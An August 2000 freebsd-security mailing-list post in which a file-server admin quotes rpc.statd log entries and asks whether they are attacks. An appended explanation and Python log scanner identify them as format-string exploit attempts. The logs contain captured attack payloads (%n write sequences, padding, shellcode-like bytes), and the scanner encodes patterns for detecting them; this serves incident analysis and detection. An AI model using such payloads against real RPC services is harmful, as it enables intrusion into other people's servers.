Date: Thu, 17 Aug 2000 16:23:34 -0500 (CDT)
From: David La Croix <dlacroix@cowpie.acm.vt.edu>
To: freebsd-security@freebsd.org
Subject: rpc.statd -- is someone trying to exploit a buffer overflow?
Message-ID: <200008172123.RAA16515@cowpie.acm.vt.edu>
I manage a fileserver for my company, and it happens to be running FreeBSD 3.4-Stable (April 10) with NFS enabled. I've noticed repeated messages of the form:

DATE maurice rpc.statd: invalid hostname to sm_stat: lots of binary crap.

The binary stuff takes on 2 values:

Aug 9 07:02:40 maurice rpc.statd: invalid hostname to sm_stat: ^Xw^??^Xw^??^Yw^ ??^Yw^??^Zw^??^Zw^??^[w^??^[w^??%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n% 192x%n^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P ^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P ^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P ^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P ^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P ^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P ^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P ^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P ^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P ^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P ^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P

and

Aug 9 17:22:50 maurice rpc.statd: Invalid hostname to sm_mon: ^Dw^??^Dw^??^Ew^? ?^Ew^??^Fw^??^Fw^??^Gw^??^Gw^??%08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %0242x%n%055x%n%012x%n%0192x%n^P^P^P^P^P^P^P^P^P^P^P^P^P^P^ P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^PkK^ v,^Cn ^M^(^CF ^0^Cn ^M^.^CF ^CC ^Ck# ^41@^Cn ^HF'^HF*^CF ^HF+ F80+, s^MN,^MV8M

All told, there have been a total of 49 entries like this in the log of this one server.

Can ANYBODY explain what these messages mean? Is it an attempt by someone to exploit a buffer overflow via bad DNS? Is someone (script kiddie) trying to hack boxes all over the place that have an old rpc.statd? Is there anything I should be concerned about? (I am about to enable firewall code on the box in question to block access to RPC and other stuff from outside the immediate LAN. Just a little tricky doing this on a production box while people are working.)
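The quoted entries are format-string payloads rather than bad DNS: the `%8x ... %n` sequences are printf conversions, `%n` writes to memory, and the run of `^P` bytes is padding that follows them. As an added example that is not part of the original thread, the following Python scanner picks such rpc.statd entries out of a syslog file by looking for those two markers; the sample lines are constructed (much shorter than the quoted ones) and the caret notation for control characters is assumed to be what syslog wrote.

```python
import re
from dataclasses import dataclass

# Lines rpc.statd logs when the hostname carried in an SM_STAT / SM_MON
# request does not resolve; both capitalisations seen in the thread match.
STATD_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) (?P<host>\S+) rpc\.statd: "
    r"[Ii]nvalid hostname to (?P<proc>sm_\w+): (?P<name>.*)$"
)
# printf-style conversions; %n is the one that writes to memory
FMT_DIRECTIVE = re.compile(r"%0?\d*[diouxXn]")
# control characters in caret notation (^P, ^?) as syslog renders them, or raw
CONTROL = re.compile(r"\^[@-_?]\??|[\x00-\x1f\x7f-\xff]")

@dataclass
class Finding:
    host: str
    proc: str
    directives: int
    writes: int       # occurrences of %n
    controls: int
    suspicious: bool

def analyse(line):
    """Return a Finding for an rpc.statd hostname complaint, else None."""
    m = STATD_RE.match(line)
    if not m:
        return None
    name = m.group("name")
    directives = len(FMT_DIRECTIVE.findall(name))
    writes = name.count("%n")
    controls = len(CONTROL.findall(name))
    # A hostname that merely fails DNS contains neither '%' conversions nor
    # control characters; any %n, or a pile of either, is not DNS noise.
    suspicious = writes > 0 or directives >= 4 or controls > 8
    return Finding(m.group("host"), m.group("proc"), directives, writes, controls, suspicious)

def scan(lines):
    """Findings for every rpc.statd hostname complaint in an iterable of lines."""
    return [f for f in map(analyse, lines) if f is not None]

# Constructed sample log, modelled on (and much shorter than) the quoted entries.
SAMPLE_LOG = [
    "Aug  9 07:02:40 maurice rpc.statd: invalid hostname to sm_stat: "
    "^Xw^??^Xw^??%8x%8x%8x%8x%236x%n%137x%n^P^P^P^P^P^P^P^P^P^P",
    "Aug  9 08:15:01 maurice rpc.statd: Invalid hostname to sm_mon: "
    "nfsclient7.corp.example",
    "Aug  9 08:15:02 maurice sshd[812]: Accepted publickey for ops from 10.0.0.5",
]
```

Running `scan(SAMPLE_LOG)` flags only the first entry; the second is an ordinary unresolvable client name and the sshd line is ignored.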